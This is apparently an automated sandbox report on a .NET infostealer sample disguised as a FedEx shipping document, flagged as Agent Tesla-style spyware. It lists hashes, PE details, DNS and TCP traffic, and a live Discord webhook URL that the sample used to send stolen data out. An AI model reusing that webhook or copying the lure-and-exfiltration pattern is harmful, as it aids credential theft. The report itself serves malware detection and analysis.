        FeDex_shipping_document.exe | 100% | Joe Sandbox ML | |

        Dropped files: No Antivirus matches

        Source | Detection | Scanner | Label | Link | Download
        1.2.FeDex_shipping_document.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File

        Source | Detection | Scanner | Label | Link
        discord.com | 0% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        https://discord.com | 0% | URL Reputation | safe |
        http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
        http://www.tiro.com | 0% | URL Reputation | safe |
        http://discord.com | 0% | URL Reputation | safe |
        http://discord.com | 0% | URL Reputation | safe |
        http://www.goodfont.co.kr | 0% | URL Reputation | safe |
        http://www.carterandcone.coml | 0% | URL Reputation | safe |
        http://www.sajatypeworks.com | 0% | URL Reputation | safe |
        http://www.typography.netD | 0% | URL Reputation | safe |
        http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
        http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
        http://fontfabrik.com | 0% | URL Reputation | safe |
        http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
        https://discord.com4 | 0% | URL Reputation | safe |
        http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
        http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL | 0% | Avira URL Cloud | safe |
        http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj | 0% | Avira URL Cloud | safe |
        http://www.sandoll.co.kr | 0% | URL Reputation | safe |
        http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
        http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
        http://www.sakkal.com | 0% | URL Reputation | safe |
        https://discord.comD8 | 0% | Avira URL Cloud | safe |
        Domains and IPs

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        discord.com | 162.159.138.232 | true | true | | unknown
        api4.ipify.org | 64.185.227.155 | true | false | | high
        api.ipify.org | unknown | unknown | false | | high

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        https://api.ipify.org/ | false | | high
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj | true | Avira URL Cloud: safe | unknown
        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://www.apache.org/licenses/LICENSE-2.0 | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.fontbureau.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.fontbureau.com/designersG | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.com | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers/? | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.founder.com.cn/cn/bThe | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers? | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.tiro.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://discord.com | FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe, URL Reputation: safe | unknown
        http://www.fontbureau.com/designers | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.comD8 | FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.goodfont.co.kr | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.carterandcone.coml | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.sajatypeworks.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.typography.netD | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.fontbureau.com/designers/cabarga.htmlN | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.founder.com.cn/cn/cThe | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.galapagosdesign.com/staff/dennis.htm | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://api.ipify.org | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://fontfabrik.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.founder.com.cn/cn | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers/frere-jones.html | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.com4 | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.jiyu-kobo.co.jp/ | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe, URL Reputation: safe | unknown
        http://www.galapagosdesign.com/DPlease | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.fontbureau.com/designers8 | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.fonts.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.sandoll.co.kr | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.urwpp.deDPlease | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.zhongyicts.com.cn | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
        http://www.sakkal.com | FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
        Contacted IPs

        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        162.159.138.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | true
        64.185.227.155 | api4.ipify.org | United States | | 18450 | WEBNXUS | false
        162.159.135.232 | unknown | United States | | 13335 | CLOUDFLARENETUS | false
        General Information

        Joe Sandbox Version: 37.0.0 Beryl
        Analysis ID: 830454
        Start date and time: 2023-03-20 11:50:40 +01:00
        Joe Sandbox Product: CloudBasic
        Overall analysis duration: 0h 9m 14s
        Hypervisor based Inspection enabled: false
        Report type: light
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of new started processes analysed: 13
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Sample file name: FeDex_shipping_document.exe
        Detection: MAL
        Classification: mal100.troj.spyw.evad.winEXE@3/2@4/3
        EGA Information:
        • Successful, ratio: 100%
        HDC Information: Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Excluded processes from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 23.10.249.147, 23.10.249.178, 93.184.221.240, 8.238.85.126, 8.241.126.121, 8.248.137.254, 67.26.75.254, 8.238.88.254
        • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
        • Not all processes were analyzed; the report is missing behavior information
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Time | Type | Description
        11:51:45 | API Interceptor | 683x Sleep call for process: FeDex_shipping_document.exe modified
        Created / Dropped Files

        Process: C:\Users\user\Desktop\FeDex_shipping_document.exe
        File Type: ASCII text, with CRLF line terminators
        Category: dropped
        Size (bytes): 1216
        Entropy (8bit): 5.355304211458859
        Encrypted: false
        SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
        MD5: FED34146BF2F2FA59DCF8702FCC8232E
        SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
        SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
        SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
        Malicious: true
        Reputation: high, very likely benign file
        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

        Process: C:\Users\user\Desktop\FeDex_shipping_document.exe
        File Type: SQLite 3.x database, last written using SQLite version 3038005, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 10
        Category: dropped
        Size (bytes): 28672
        Entropy (8bit): 0.4393511334109407
        Encrypted: false
        SSDEEP: 24:TLqlj1czkwubXYFpFNYcw+6UwcYzHrSl:TyxcYwuLopFgU1YzLSl
        MD5: 8C31C5487A97BBE73711C5E20600C1F6
        SHA1: D4D6B04226D8FFC894749B3963E7DB7068D6D773
        SHA-256: A1326E74262F4B37628F2E712EC077F499B113181A1E937E752D046E43F1689A
        SHA-512: 394391350524B994504F4E748CCD5C3FA8EF980AED850A5A60F09250E8261AC8E300657CBB1DBF305729637BC0E1F043E57799E2A35C82EEA3825CE5C9E7051D
        Malicious: false
        Reputation: high, very likely benign file
                                              Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.864054907684923
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:FeDex_shipping_document.exe
                                              File size:746496
                                              MD5:5cf87a160007a5e6c7a4d24e1d831327
                                              SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
                                              SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
                                              SHA512:c11e2c571817ac519ef89019529171d64e9f3faa17a2ccd51a55770113eff83e27f3a53133cec3daa096f989fafedd378e759cc4030b83489ebccbd7aa425237
                                              SSDEEP:12288:EDBmYMUnFW/NMbbjHAaBvaDzGkSjT+vbuxiZQ7GiPLbk6jdoVx2ye6yb:EDBUibAXPGD+zKiri/kCGVYye6q
                                              TLSH:66F402342FEA6239F57657BDD9E43295236E77B22703D95E04B121CA4B63B028DC092F
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0..N..........Rm... ........@.. ....................................@................................
                                              Icon Hash:209480e66eb84902
                                              Entrypoint:0x4b6d52
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6417BCAC [Mon Mar 20 01:53:48 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb6cfd          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb8000          0x1110        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xba000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xb58e8          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xb4d58       0xb4e00   False     0.9268084290774016  data       7.872797130775443    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xb8000          0x1110        0x1200    False     0.73046875          data       6.631473125860904    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xba000          0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                                              Language  Country
RT_ICON        0xb8100  0xa79  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON  0xb8b8c  0x14   data
RT_VERSION     0xb8bb0  0x360  data
RT_MANIFEST    0xb8f20  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                  Source Port  Dest Port  Source IP    Dest IP
03/20/23-11:52:05.074477  TCP       2851779  ETPRO TROJAN Agent Tesla Telegram Exfil  49701        443        192.168.2.7  162.159.138.232
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Mar 20, 2023 11:51:49.157324076 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:49.157382011 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:49.157479048 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:49.196374893 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:49.196409941 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:57.077124119 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:57.077359915 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:57.808013916 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:57.808080912 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:57.808967113 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:57.874470949 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:58.269769907 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:58.269812107 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:59.014796972 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:51:59.014924049 CET  443          49700      64.185.227.155   192.168.2.7
Mar 20, 2023 11:51:59.014995098 CET  49700        443        192.168.2.7      64.185.227.155
Mar 20, 2023 11:52:04.950087070 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:04.950215101 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:04.950337887 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:04.952203989 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:04.952301979 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.009949923 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.010083914 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:05.014666080 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:05.014695883 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.015054941 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.018209934 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:05.018237114 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.073689938 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.074287891 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:05.074341059 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.421833992 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.422219038 CET  443          49701      162.159.138.232  192.168.2.7
Mar 20, 2023 11:52:05.422296047 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:05.424500942 CET  49701        443        192.168.2.7      162.159.138.232
Mar 20, 2023 11:52:06.002155066 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.002207994 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.002302885 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.003519058 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.003566027 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.051467896 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.055735111 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.055769920 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.124003887 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.124957085 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.125015020 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.437938929 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.438318968 CET  443          49702      162.159.135.232  192.168.2.7
Mar 20, 2023 11:52:06.438410997 CET  49702        443        192.168.2.7      162.159.135.232
Mar 20, 2023 11:52:06.440745115 CET  49702        443        192.168.2.7      162.159.135.232
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 20, 2023 11:51:49.083699942 CET  59477        53         192.168.2.7  8.8.8.8
Mar 20, 2023 11:51:49.103337049 CET  53           59477      8.8.8.8      192.168.2.7
Mar 20, 2023 11:51:49.115154028 CET  55752        53         192.168.2.7  8.8.8.8
Mar 20, 2023 11:51:49.135409117 CET  53           55752      8.8.8.8      192.168.2.7
Mar 20, 2023 11:52:04.919559956 CET  50330        53         192.168.2.7  8.8.8.8
Mar 20, 2023 11:52:04.941693068 CET  53           50330      8.8.8.8      192.168.2.7
Mar 20, 2023 11:52:05.979279041 CET  56588        53         192.168.2.7  8.8.8.8
Mar 20, 2023 11:52:06.000864029 CET  53           56588      8.8.8.8      192.168.2.7
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name           Type            Class        DNS over HTTPS
Mar 20, 2023 11:51:49.083699942 CET  192.168.2.7  8.8.8.8  0xd371    Standard query (0)  api.ipify.org  A (IP address)  IN (0x0001)  false
Mar 20, 2023 11:51:49.115154028 CET  192.168.2.7  8.8.8.8  0x7dd7    Standard query (0)  api.ipify.org  A (IP address)  IN (0x0001)  false
Mar 20, 2023 11:52:04.919559956 CET  192.168.2.7  8.8.8.8  0x8554    Standard query (0)  discord.com    A (IP address)  IN (0x0001)  false
Mar 20, 2023 11:52:05.979279041 CET  192.168.2.7  8.8.8.8  0xf5ae    Standard query (0)  discord.com    A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name            CName           Address          Type                    Class        DNS over HTTPS
Mar 20, 2023 11:51:49.103337049 CET  8.8.8.8    192.168.2.7  0xd371    No error (0)  api.ipify.org   api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 11:51:49.103337049 CET  8.8.8.8    192.168.2.7  0xd371    No error (0)  api4.ipify.org                  64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:51:49.103337049 CET  8.8.8.8    192.168.2.7  0xd371    No error (0)  api4.ipify.org                  104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:51:49.103337049 CET  8.8.8.8    192.168.2.7  0xd371    No error (0)  api4.ipify.org                  173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:51:49.135409117 CET  8.8.8.8    192.168.2.7  0x7dd7    No error (0)  api.ipify.org   api4.ipify.org                   CNAME (Canonical name)  IN (0x0001)  false
Mar 20, 2023 11:51:49.135409117 CET  8.8.8.8    192.168.2.7  0x7dd7    No error (0)  api4.ipify.org                  64.185.227.155   A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:51:49.135409117 CET  8.8.8.8    192.168.2.7  0x7dd7    No error (0)  api4.ipify.org                  173.231.16.76    A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:51:49.135409117 CET  8.8.8.8    192.168.2.7  0x7dd7    No error (0)  api4.ipify.org                  104.237.62.211   A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:04.941693068 CET  8.8.8.8    192.168.2.7  0x8554    No error (0)  discord.com                     162.159.138.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:04.941693068 CET  8.8.8.8    192.168.2.7  0x8554    No error (0)  discord.com                     162.159.136.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:04.941693068 CET  8.8.8.8    192.168.2.7  0x8554    No error (0)  discord.com                     162.159.137.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:04.941693068 CET  8.8.8.8    192.168.2.7  0x8554    No error (0)  discord.com                     162.159.128.233  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:04.941693068 CET  8.8.8.8    192.168.2.7  0x8554    No error (0)  discord.com                     162.159.135.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:06.000864029 CET  8.8.8.8    192.168.2.7  0xf5ae    No error (0)  discord.com                     162.159.135.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:06.000864029 CET  8.8.8.8    192.168.2.7  0xf5ae    No error (0)  discord.com                     162.159.137.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:06.000864029 CET  8.8.8.8    192.168.2.7  0xf5ae    No error (0)  discord.com                     162.159.136.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:06.000864029 CET  8.8.8.8    192.168.2.7  0xf5ae    No error (0)  discord.com                     162.159.138.232  A (IP address)          IN (0x0001)  false
Mar 20, 2023 11:52:06.000864029 CET  8.8.8.8    192.168.2.7  0xf5ae    No error (0)  discord.com                     162.159.128.233  A (IP address)          IN (0x0001)  false
                                              • api.ipify.org
                                              • discord.com

                                              Target ID:0
                                              Start time:11:51:39
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Imagebase:0xe70000
                                              File size:746496 bytes
                                              MD5 hash:5CF87A160007A5E6C7A4D24E1D831327
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low

                                              Target ID:1
                                              Start time:11:51:46
                                              Start date:20/03/2023
                                              Path:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\FeDex_shipping_document.exe
                                              Imagebase:0xac0000
                                              File size:746496 bytes
